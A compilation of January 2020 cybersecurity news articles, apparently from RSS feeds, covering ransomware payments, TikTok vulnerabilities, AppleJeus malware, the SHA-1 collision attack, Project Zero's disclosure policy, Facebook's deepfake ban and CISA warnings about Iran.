STE WILLIAMS

15% of Ransomware Victims Paid Ransom in 2019, Quadrupling 2018

Increasing sophistication of ransomware attacks might be forcing victims to open their wallets.

Fewer survey respondents reported ransomware attacks in 2019 than in 2018, according to a recent Dark Reading survey. Yet, the number reporting that they paid an attackers’ ransom nearly quadrupled — rising to 15% of those that had suffered a ransomware attack.

Ten percent of respondents stated that their organization had suffered a ransomware attack (down from 12% in the 2018 study). Of those, fifteen percent said that they paid the ransom, up from just 4% last year.   

Ransomware attacks are becoming increasingly severe and sophisticated. As Jai Vijayan wrote for Dark Reading last month:

Some recent developments include growing collaboration between threat groups on ransomware campaigns; the use of more sophisticated evasion mechanisms; elaborate multi-phase attacks involving reconnaissance and network scoping; and human-guided automated attack techniques. …

In many attacks, threat actors have first infected a target network with malware like Emotet and Trickbot to try and gather as much information about systems on the network as possible. The goal is to find the high-value systems and encrypt data on it so victims are more likely to pay.

If we look at the big picture, we will discover that what is changing is the threat actors’ approach to distributing the Trojans and selecting their victims,” Fedor Sinitsyn, senior malware analyst at Kaspersky says. If five years ago almost all ransomware was mass-scale and the main distribution vector was via spam, nowadays many criminals are using targeted attacks instead.

On a sunnier note, more companies might be paying ransoms because they have cyber insurers to help them bear the cost of those payments. As the police chief of Valdez, Alaska told Dark Reading after the city fell victim to ransomware, “I can’t emphasize enough how much [cyber insurance] saved our community.” 

Thirty-four percent of respondents to the Dark Reading report said they have insurance specifically for cyber incidents — double the number reported in 2017 — and 18% reported filing a claim.

Download the full report, How Data Breaches Affect the Enterprise, here. 

The Edge is Dark Reading’s home for features, threat data and in-depth perspectives on cybersecurity. View Full Bio

Article source: https://www.darkreading.com/edge/theedge/15--of-ransomware-victims-paid-ransom-in-2019-quadrupling-2018-/b/d-id/1335147?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

TikTok on the clock, and the hacking won’t stop: SMS spoofing vuln let baddies twiddle teens’ social media videos

TikTok, a mobile video app popular with teens, was vulnerable to SMS spoofing attacks that could have led to the extraction of private information, according to infosec researchers.

The app is used mainly by the youth of today to share and save short videos of themselves and friends, often set to a popular music track, with an optional array of visual and sound effects – a la Snapchat. Research from Israeli outfit Check Point found that an attacker could send a spoofed SMS message to a user containing a malicious link.

If the user clicked that malicious link, the attacker could access the user’s TikTok account and, so Check Point said, manipulate its content by deleting videos, uploading new videos and making private or “hidden” videos public.

Check Point told ByteDance, TikTok’s developer, of its findings in late November 2019. A patch was issued around a month later.

The vuln was in how TikTok validated newly signed-up mobile phone numbers. When a new user signs up for TikTok, the app sends them an SMS. Check Point found out that a hacker can manipulate and send text messages to any phone number, appearing to come from TikTok. Malicious links in those messages could then inject and trigger the execution of malicious code.

Oded Vanunu, Check Point’s head vuln researcher, opined: “Malicious actors are spending large amounts of money and time to try and penetrate these hugely popular applications – yet most users are under the assumption that they are protected by the app they are using.”

Luke Deshotels, a TikTok security staffer, said in a canned statement: “TikTok is committed to protecting user data. Before public disclosure, CheckPoint agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.”

The research also found that Tiktok’s subdomain (https://ads.tiktok.com) was vulnerable to XSS attacks, a type of attack in which malicious scripts are injected into otherwise benign and trusted websites. Check Point researchers leveraged this vulnerability to retrieve personal information saved on user accounts, including private email addresses and birthdates.

TikTok was banned by the US Army in late December over security fears, though those were publicly linked to its Chinese origins. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/tiktok_vulns_/

In a desperate bid to stay relevant in 2020’s geopolitical upheaval, N. Korea upgrades its Apple Jeus macOS malware

Malware hunters are sounding the alarm over a new, more effective version of the North Korean “Apple Jeus” macOS software nasty.

The team at Kaspersky Lab’s Global Research and Analysis Team has dissected what they say is a ‘sequel’ to the 2018 outbreak that targeted users on cryptocurrency sites for account theft.

Believed to be operating out of North Korea on behalf of the nation’s authoritarian government, the Lazarus group looks to bring cash into the sanction-hit government’s coffers by way of hacks on financial institutions, phishing and currency mining and theft operations.

To that extent, Apple Jeus sets its sites on cryptocurrency exchanges, where it masquerades as legitimate trading software in order to slip a remote access trojan onto victim’s machines. The infected boxes can then be pilfered for valuable files and account details.

In its latest incarnation, billed as a significant upgrade to the 2018 version, AppleJeus is able to circumvent authentication requests while doing its dirty work, thus making it harder for the user to see something is amiss and stop the attack.

“We identified significant changes to the group’s attack methodology,” the Kaspersky team explained. “To attack macOS users, the Lazarus group has developed homemade macOS malware, and added an authentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without touching the disk.”

The malware uses GitHub to host malicious applications and its writers have shifted to using Object-C instead of QT framework for the attack code.

Shutterstock pickpocket

Nork hackers Lazarus brought back to life by AppleJeus to infect Macs for the first time

READ MORE

So far, the macOS infection has been spotted operating under the names JMTTrading and UnionCryptoTrader, and in addition to proliferating on a number of cryptocoin exchanges, the malware has been spotted in the wild on machines in the UK, Poland, Russia, and China. As this is a financially-motivated attack, the group is likely trying to infect as many cryptocoin investors and exchanges as possible.

Lazarus was also found to be tinkering with the Windows version of the malware. In that case, the malware was found to be spreading via the Telegram messenger. Like the macOS malware, the Windows build disguises its backdoor installer as a legitimate cryptocurrency trading app called ‘UnionCryptoTrader’.

“The binary infection procedure in the Windows system differed from the previous case. They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack,” the researchers noted.

“We believe the Lazarus group’s continuous attacks for financial gain are unlikely to stop anytime soon.” ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/applejeus_malware_returns/

Hash snag: Security shamans shame SHA-1 standard, confirm crucial collisions citing circa $45k chip cost

SHA-1 stands for Secure Hash Algorithm but version 1, developed in 1995, isn’t secure at all. It has been vulnerable in theory since 2004 though it took until 2017 for researchers at CWI Amsterdam and Google to demonstrate a practical if somewhat costly collision attack.

Last year, crypto-boffins Gaëtan Leurent, from Inria in France, and Thomas Peyrin, from Nanyang Technological University in Singapore, proposed [PDF] a more robust technique, a chosen-prefix collision attack.

And this week, at the Real World Crypto Symposium in the US, they described how they made it work.

“This more powerful attack allows to build colliding messages with two arbitrary prefixes, which is much more threatening for real protocols,” said Leurent and Peyrin in a paper, SHA-1 is a Shambles, presented at the conference.

A hash algorithm is a function that mathematically maps input data to another value of fixed length. Think of it as one-way encryption: you convert your input data, however long it is, into a summary or fingerprint that has a set size, with no way of recreating the original from this hash. Changing even a small part of the input data produces a significant change in hash, ideally. The hash is usually a lot smaller than the input.

Hashes are thus used for authentication and related applications: by comparing hashes, you can be sure data hasn’t been tampered with while in transit, for instance. A hash collision occurs when two separate inputs produce the same output – obviously not desirable if you’re checking, say, checking a stored hash of a password against a hash of a user-supplied password and you want only one specific password to provide access.

A chosen-prefix collision, because it allows the attacker to choose the prefixed content, represents a more serious threat.

Back in 2012, the same year America’s National Institute of Standards Technology (NIST) advised against using SHA-1 for applications that require collision resistance, cryptographer Bruce Schneier estimated that the cloud computing bill for carrying out a SHA-1 attack would be about $2.77m. And he projected the cost would fall to about $43,000 by 2021.

In their paper, Leurent and Peyrin put the theoretical cost at $11,000 for a SHA-1 collision and $45,000 for a chosen-prefix collision. To actually carry out their attack required two months of computation time using 900 Nvidia GTX 1060 GPUs. The boffins paid about $75,000 because GPU prices were higher at the time and because they wasted time during attack preparation.

Their attack involved creating a pair of PGP/GnuPG keys with different identities, but colliding SHA-1 certificates, allowing them to impersonate a victim and digitally sign documents in the victim’s name.

“Our work shows that SHA-1 is now fully and practically broken for use in digital signatures,” the researchers state in their paper. “GPU technology improvements and general computation cost decrease will quickly render our attack even cheaper, making it basically possible for any ill-intentioned attacker in the very near future.”

Much of the technical community has already taken action to avoid SHA-1 in vulnerable contexts. Web browsers like Chrome and Firefox stopped accepting SSL SHA-1 certificates in early 2017, followed by Edge and Internet Explorer a few months later.

In November last year, Apple said it would not longer trust SHA-1 certificates in macOS 10.15 and iOS 13. Microsoft took similar steps last year as well.

Usage of SHA-1 is low – Leurent and Peyrin claim about 1 per cent of website certificates still rely on it, down from 20 per cent in 2017. Nonetheless, SHA-1 signatures are still supported in many applications.

“SHA-1 is the default hash function used for certifying PGP keys in the legacy branch of GnuPG (v 1.4), and those signatures were accepted by the modern branch of GnuPG (v 2.2) before we reported our results,” they note. “Many non-web TLS clients also accept SHA-1 certificates, and SHA-1 is still allowed for in-protocol signatures in TLS and SSH.”

Leurent and Peyrin contacted several affected vendors in the spirit of responsible disclosure, but say they could not notify everyone. GnuPG patched the problem in its November 25, 2019 release so that SHA-1-based identity signatures created after 2019-01-19 are no longer valid.

Weapon of the information wars from Shutterstock

Dev writes Ethereum code for insecure SHA-1 crypto hash function

READ MORE

The researchers note that even if SHA-1 usage is low, miscreant-in-the-middle attacks may downgrade connections to SHA-1. Also, SHA-1 continues to be the foundation of the Git version control system. CAcert, a Certificate Authority for PGP keys, has acknowledged the researchers’ concerns but not yet dealt with the issue. And OpenSSL developers, the researchers say, are considering disabling SHA-1 for the security level 1 setting, which calls for at least 80-bit security (SHA-1 produces a 160-bit hash value).

Back in 2017, Git creator Linus Torvalds dismissed concerns about attacks on Git SHA-1 hashes. GitHub, Microsoft’s hosted Git service, offered similar reassurance, noting in a blog post that it had implemented collusion detection for each hash it computes and that the open source Git project is developing a plan to move away from SHA-1.

GitHub did not immediately respond to a request for comment.

Evidence of efforts to implement SHA-256 can be seen on the Git mailing list, but the work appears to be ongoing. At the moment, Git developers advise using the collision detection library developed in 2017 and implemented by GitHub to check repo integrity. ®

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/01/08/hash_slamming_security_shamans/

In App Development, Does No-Code Mean No Security?

No-code and low-code development platforms are part of application development, but there are keys to making sure that they don’t leave security behind with traditional coding.

(image by gaihong, via Adobe Stock)

The new trend in enterprise application development: creating new applications without writing code. “Low-code” or “no-code” development platforms offer the promise of rapid application development — often by business-unit or subject-matter experts — without the overhead of traditional development by traditional developers.

The question is whether no-code also means no security.

From content management systems like WordPress to enterprise application builders like Appian, no/low-code platforms are intended to allow developers to focus on the application logic while the details of device, delivery network, and user interfaces are left to the platform. “Low-code and no-code development models are powerful and democratize development for non-technical users to easily build powerful workflows,” says Vinay Namidi, senior director of project management at Virsec. “But there’s always a gotcha — while trained developers may have varying levels of skill in security, no-code developers are generally oblivious to security best practices or risks.”

Does training matter?

While business unit developers may not have the security expertise of trained enterprise software developers, the operating assumption is that the platforms themselves build security into the final product. “The onus moves onto the framework from the [platform] developers, so [the platform users] don’t have to understand secure coding,” explains Jason Kent, hacker in residence at Cequent. “But that assumes that the framework is written securely.”

That assumption can be a good one, if the framework is being used the way it was intended.

Ali Golshan, CTO and co-founder at StackRox, feels that smaller companies with limited development staff and lines of business creating applications that are not enterprise-critical are good use cases, because, “…there’s a huge step up [in security] because there is a common denominator as far as security best practices and implementations that framework providers build into their own SDLC [software development lifecycle].”

The common denominator in security can include some of the basic functions that should be part of secure application development but are often overlooked. “[No-code development] also has the advantage of raising the security barrier since most lower-level vulnerabilities, stemming from the lack of input validation and code integrity checks, are taken care of by the platform,” says Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

But those things don’t take responsibility for security away from the application development team.

Best no-code practices

“In no way does this solve the general problem of securing an application,” Hahad says, continuing, “Patching for vulnerable subsystems and third-party code still needs to be done, for example.”

The same characteristics that make no-code development so productive for some organizations can bring challenges when it comes to security. “With no-code platforms, enterprises quickly lose visibility over critical processes and data usage, and users can easily build business logic that exposes sensitive or regulated information,” says Namedi. He says that organizations using no-code development must make specific plans for security (and regulatory compliance) from the beginning of the process.

“Enterprises must find ways to audit processes and vendors, and maintain reasonable security oversight, even if that makes the process a bit less convenient,” Namedi says.

As part of the audit and security process, Golshan points out that knowing what’s actually going on within the application is important.

“You want to deploy your application on top of a cloud native environment where there is some notion of deep logging,” he says, explaining that tracing and building support for microservices environments is critical.

Partnerships matter

To keep “no-code” from becoming synonymous with “shadow IT,” a deep partnership between the team building the applications and the organization’s security team is important. “There’s a lot of resistance on the security side and developer side to make that that first step, but it’s critical. It’s critical for organizations to encourage that,” says Matt Keil, director of product marketing at Cequence.

Keil says that the introduction of no-code development can actually be the impetus for starting the critical conversation between security and the developers. “I think the right approach is to engage with the business group in a conversation. Don’t act like ‘Doctor No’ that’s just going to continue to foster the divide between security and the development team,” he continues.

Among the areas that Golshan feels should be considered are those that control who (and what) has access to the application. “I think one of the areas that low-code/ No-code has the potential to really improve is how it handles access management, authentication, and authorization,” he says.

And for all of the areas that should be considered, experts point back to the documents produced by NIST as useful frameworks for organizations to lean on. While some consider the NIST documents as being useful primarily for government organizations, the principles can be valuable for any organization, especially those looking to develop in a new methodology.

Ultimately, though, the best chance for success may be to have someone who makes sure the organization doesn’t forget security. “The most successful organizations that I see have an application security architect — somebody with a foot in security and a foot in development,” says Kent. “They can more easily identify and define the kinds of controls that you need to make low code,/no code environments secure and still collaborative.”

Related content:

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/edge/theedge/in-app-development-does-no-code-mean-no-security-/b/d-id/1336740?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

TikTok Bugs Put Users’ Videos, Personal Data At Risk

Researchers found it was possible to spoof SMS messages from TikTok and exploit an API flaw that could grant access to users’ personal data.

Check Point Research analysts have discovered multiple vulnerabilities in the TikTok video sharing app that could have enabled attackers to manipulate users’ videos and access personal information. ByteDance, the developer behind TikTok, has since deployed fixes for these flaws.

TikTok lets its massive user base – primarily teenagers and kids – record, save, and share videos they can choose to make public or keep private. The app has more than one billion global users and availability across more than 150 markets and 75 languages. As of Oct. 2019, researchers report, TikTok was one of the most frequently downloaded applications around the world.

The vulnerabilities Check Point discovered could let intruders gain access to TikTok accounts and manipulate their content. Attackers could delete videos; upload unauthorized videos; make private videos public; and access data including full name, email address, and birthdate.

“We found a chain of vulnerabilities,” says Oded Vanunu, head of products vulnerability research at Check Point. “The entire application business logic had a big lack of security. We saw that easily, bad actors can take control of an account, change videos from private to public, [and] leak private information. In this platform, this is a big deal.”

One of the possible attack vectors is SMS link spoofing: a bug in the app’s infrastructure made it possible to send an SMS message to any phone number on behalf of TikTok. Users who visit TikTok’s website can enter their phone number to receive a text with a link to download the app. An attacker could exploit this process to spoof SMS through TikTok infrastructure and send a malicious link to potential victims; if clicked, the attacker could have access to their videos.

“Once [the attacker] sends an SMS to a user and adds some URL coming from TikTok, the user clicks the URL and the attacker has the account,” Vanunu explains, noting an attacker could also spoof TikTok to send a malicious link through WhatsApp, Gmail, or another messaging app.

Researchers also found it was possible to send victims a link that could redirect them to a malicious website, a process that creates the possibility of cross-site scripting (XSS), request forgery (CSRF), and sensitive data exposure attacks without user consent. Through XSS and link spoofing, they could execute JavaScript code on behalf of any victim who clicks a malicious link.

In addition to discovering ways to add and delete videos, as well as switch videos from private to public, researchers found several API calls in different TikTik subdomains. Making requests to these APIs could reveal sensitive information including users’ payment data, email address, and birthdate. Users generally have no indication their account is being manipulated unless they spot unauthorized videos or notice private content has been switched to public, says Vanunu.

Once the team analyzed these vulnerabilities, they brought their findings to TikTok in Nov. 2019. ByteDance took 2-3 weeks to fix the bugs and infrastructure issues they discovered.

“TikTok is committed to protecting user data,” says Luke Deshotels, PhD, of the TikTok security team in a statement to Check Point. “Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app.”

Check Point has spent the last two years investigating technologies and platforms that serve hundreds of millions of users, Vanunu says. “We’re clearly seeing, in cyberspace, that bad actors are putting a lot of effort financially, and from a research perspective, to find vulnerabilities on these platforms to distribute malicious activity.”

This isn’t the first time Chinese-owned TikTok has sparked security concerns: late last year, US lawmakers called for an assessment of risks posed by the app, which they fear may give Chinese intelligence a means of spying on uses’ phones. The US Army, which once used TikTok as a recruiting tool, has banned soldiers from using the app. It’s now considered a security threat.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Car Hacking Hits the Streets.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/application-security/tiktok-bugs-put-users-videos-personal-data-at-risk/d/d-id/1336745?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google’s Project Zero Policy Change Mandates 90-Day Disclosure

The updated disclosure policy aims to achieve more thorough and improved patch development, Google reports.

Google’s Project Zero, a division focused on security research, today announced changes to its Disclosure Policy. All vulnerabilities will be released after 90 days by default regardless of when a bug is fixed, unless an agreement has been made between Project Zero and the vendor.

The 90-day disclosure deadline has existed for five years and accelerated patch development. When Project Zero began in 2014, some vulnerabilities took longer than six months to address. Last year, 97.7% of issues were addressed under the 90-day deadline. Still, the division recognizes there is progress to be made in patch development and vulnerability management.

Now it is trialing a new policy for bugs reported starting January 1, 2020. Project Zero’s old guidelines allowed vulnerability details to be released when the bug was fixed, even if it was ahead of Day 90. Its new policy eliminates early disclosure: details will be released on Day 90 for all bugs. If there is mutual agreement between the vendor and Project Zero, bug reports can be released to the public under the 90-day timeline, researchers report in a blog post.

The goal is to provide a more consistent, and fair way to release patches, wrote Project Zero’s Tim Willis in a blog post. While faster patch development remains a goal, the team is now placing equal focus on thorough patch development and broad adoption. It also hopes to create equity among vendors so no one company, including Google, gets preferential treatment.

“Too many times, we’ve seen vendors patch reported vulnerabilities by ‘papering over the cracks’ and not considering variants or addressing the root cause of a vulnerability,” Willis explained. A focus on “faster patch development” may exacerbate this issue, he continued, enabling attackers to adjust their exploits and continue launching attacks.

Further, Willis pointed out, patches must be applied in order to be effective. “To this end, improving timely patch adoption is important to ensure that users are actually acquiring the benefit from the bug being fixed.” With the mandated 90-day window, the hope is that vendors should be able to offer updates and encourage more people to install fixes within 90 days.

Project Zero will test this policy for 12 months then consider whether to make it a long-term change. Read more details in the full blog post here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Car Hacking Hits the Streets

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/googles-project-zero-policy-change-mandates-90-day-disclosure/d/d-id/1336748?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Facebook bans deepfakes, but not cheapfakes or shallowfakes

Facebook has banned deepfakes.

No, strike that – make it, Facebook has banned some doctored videos, but only the ones made with fancy-schmancy technologies, such as artificial intelligence (AI), in a way that an average person wouldn’t easily spot.

What the policy doesn’t appear to cover: videos made with simple video-editing software, or what disinformation researchers call “cheapfakes” or “shallowfakes.”

The new policy

Facebook laid out its new policy in a blog post on Monday. Monika Bickert, the company’s vice president for global policy management, said that while these videos are still rare, they present “a significant challenge for our industry and society as their use increases.”

She said that going forward, Facebook is going to remove “misleading manipulated media” that’s been “edited or synthesized” beyond minor clarity/quality tweaks, in ways that an average person can’t detect and which would depict subjects as convincingly saying words that they actually didn’t utter.

Another criteria for removal is that part about fancy-schmany editing techniques, when a video…

…is the product of artificial intelligence or machine learning that merges, replaces or superimposes content onto a video, making it appear to be authentic.

Deepfake non-consensual porn made up 96% of the total number of deepfake videos online as of the first half of 2019, according to Deeptrace, a company that uses deep learning and computer vision for detecting and monitoring deepfakes.

As far as Facebook policy is concerned, those are redundant. The platform already forbids adult nudity and sexual activity.

Facebook will be using its own staff, as well as independent fact-checkers, to judge a video’s authenticity.

Facebook says it won’t take down slurring Pelosi cheapfake

Given the latitude the new policy gives to satire, parody, or videos altered with simple/cheapo technologies, it might mean that some pretty infamous, and widely shared, cheapfakes will be given a pass and left on the platform.

Which, as the Washington Post notes, could mean that a video that, say, got slowed down by 75% – as was the one that made House Speaker Nancy Pelosi look drunk or ill – may pass muster.

In fact, Facebook confirmed to Reuters that the shallowfake Pelosi video isn’t going anywhere. In spite of the thrashing critics gave Facebook for refusing to delete the video – which went viral after being posted in May 2019 – Facebook said in a statement that it didn’t meet the standards of the new policy, since it wasn’t created with AI:

The doctored video of Speaker Pelosi does not meet the standards of this policy and would not be removed. Only videos generated by artificial intelligence to depict people saying fictional things will be taken down.

Drew Hammill, Pelosi’s Deputy Chief of Staff, criticized Facebook’s new policy, saying that it misses the mark when it comes to tackling fake news.

Nor does Facebook seem to be ready to censure cheapfakes that are the result of mislabeled footage, spliced dialogue or quotes taken out of context. Last week, we saw one such: a heavily edited video that made presidential candidate Joe Biden come off like a white nationalist. The video went viral on Thursday, with at least one Twitter share reportedly being retweeted more than 1 million times.

On Tuesday, Bill Russo, Joe Biden’s former 2020 spokesman, dubbed the new policy an “illusion of progress.” The Post quoted him:

Facebook’s policy does not get to the core issue of how their platform is being used to spread disinformation, but rather how professionally that disinformation is created.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7w8AhUNJatM/

Facebook bans deepfakes, but not cheapfakes or shallowfakes

Facebook has banned deepfakes.

No, strike that – make it, Facebook has banned some doctored videos, but only the ones made with fancy-schmancy technologies, such as artificial intelligence (AI), in a way that an average person wouldn’t easily spot.

What the policy doesn’t appear to cover: videos made with simple video-editing software, or what disinformation researchers call “cheapfakes” or “shallowfakes.”

The new policy

Facebook laid out its new policy in a blog post on Monday. Monika Bickert, the company’s vice president for global policy management, said that while these videos are still rare, they present “a significant challenge for our industry and society as their use increases.”

She said that going forward, Facebook is going to remove “misleading manipulated media” that’s been “edited or synthesized” beyond minor clarity/quality tweaks, in ways that an average person can’t detect and which would depict subjects as convincingly saying words that they actually didn’t utter.

Another criteria for removal is that part about fancy-schmany editing techniques, when a video…

…is the product of artificial intelligence or machine learning that merges, replaces or superimposes content onto a video, making it appear to be authentic.

Deepfake non-consensual porn made up 96% of the total number of deepfake videos online as of the first half of 2019, according to Deeptrace, a company that uses deep learning and computer vision for detecting and monitoring deepfakes.

As far as Facebook policy is concerned, those are redundant. The platform already forbids adult nudity and sexual activity.

Facebook will be using its own staff, as well as independent fact-checkers, to judge a video’s authenticity.

Facebook says it won’t take down slurring Pelosi cheapfake

Given the latitude the new policy gives to satire, parody, or videos altered with simple/cheapo technologies, it might mean that some pretty infamous, and widely shared, cheapfakes will be given a pass and left on the platform.

Which, as the Washington Post notes, could mean that a video that, say, got slowed down by 75% – as was the one that made House Speaker Nancy Pelosi look drunk or ill – may pass muster.

In fact, Facebook confirmed to Reuters that the shallowfake Pelosi video isn’t going anywhere. In spite of the thrashing critics gave Facebook for refusing to delete the video – which went viral after being posted in May 2019 – Facebook said in a statement that it didn’t meet the standards of the new policy, since it wasn’t created with AI:

The doctored video of Speaker Pelosi does not meet the standards of this policy and would not be removed. Only videos generated by artificial intelligence to depict people saying fictional things will be taken down.

Drew Hammill, Pelosi’s Deputy Chief of Staff, criticized Facebook’s new policy, saying that it misses the mark when it comes to tackling fake news.

Nor does Facebook seem to be ready to censure cheapfakes that are the result of mislabeled footage, spliced dialogue or quotes taken out of context. Last week, we saw one such: a heavily edited video that made presidential candidate Joe Biden come off like a white nationalist. The video went viral on Thursday, with at least one Twitter share reportedly being retweeted more than 1 million times.

On Tuesday, Bill Russo, Joe Biden’s former 2020 spokesman, dubbed the new policy an “illusion of progress.” The Post quoted him:

Facebook’s policy does not get to the core issue of how their platform is being used to spread disinformation, but rather how professionally that disinformation is created.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7w8AhUNJatM/

US warns of Iranian cyber threat

The US Department of Homeland Security has issued a total of three warnings in the last few days encouraging people to be on the alert for physical and cyber attacks from Iran. The announcements follow the US killing of Qasem Soleimani, the commander of Iran’s IRGC-Quds Force. The warnings directly address IT professionals with advice on how to secure their networks against Iranian attack.

On Monday, the Cybersecurity and Infrastructure Security Agency (CISA), which is an agency within the DHS, released the latest publication in its CISA Insights series, which provides background information on cybersecurity threats to the US.

Without explicitly mentioning Soleimani’s killing, it referred to “recent Iran-US tensions” creating a heightened risk of retaliatory acts against the US and its global interests. Organizations should be on the lookout for potential threats, especially if they represent strategic targets such as finance, energy, or telecommunications, it said. Iranian attackers could launch attacks targeting intellectual property or mount disinformation campaigns, it said, while also raising the spectre of physical attacks using improvised explosive devices or unmanned drones.

The publication added:

Review your organisation from an outside perspective and ask the tough questions – are you attractive to Iran and its proxies because of your business model, who your customers and competitors are, or what you stand for?

The same day, CISA also issued an alert specifically targeting IT pros that warned of a potential Iranian cyber response to the military strike. It recommended five actions that IT professionals could take to protect themselves, focusing on a mixture of vulnerability mitigation and incident preparation.

IT pros should:

Disable all unnecessary ports and protocols. Reducing the network attack surface, along with monitoring open ports for command and control activity, will help to reduce network vulnerability and spot potential attackers rattling the doors.

Enhance monitoring of network and email traffic. Restricting attachments and reviewing signatures for malware and phishing themes will help to stop attackers reaching users.

Patch externally facing equipment. Focus on critical vulnerabilities, the Agency warned, especially those that enable remote code execution or denial of service on public-facing equipment.

Log and limit PowerShell use. This powerful Microsoft command line tool is a known asset for online attackers who use it to navigate their way around target systems.

Keep backups updated. This means maintaining air-gapped backup files not reachable by ransomware.

The publication and alert follow a National Terrorism Advisory System (NTAS) bulletin released on 4 January that mentioned the Soleimani strike and noted that Iran’s leaders along with affiliated organisations had vowed revenge against the US.

An attack in the homeland may come with little or no warning.

The US killed Qasem Soleimani using a Reaper drone on 3 January. The strike, which congressional leaders condemned, followed mounting rocket attacks against US bases in Iraq over the past two months.

Experts both in and outside the US government have long identified Iran as a source of malicious cyber activity. Last year, an analysis highlighted an increased focus on industrial control systems from the country’s APT33 hacking group. Almost exactly a year before, the US charged Iranian hackers for their role in an attack using the SamSam ransomware.

Over the weekend, hackers claiming Iranian backing defaced the US government’s Federal Depository Library Program website with a picture of a bloodied president Trump. On Tuesday, intruders altered the Texas Department of Agriculture’s website with a message stating “Hacked by Iranian Hacker”.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jQIIJJ29FVQ/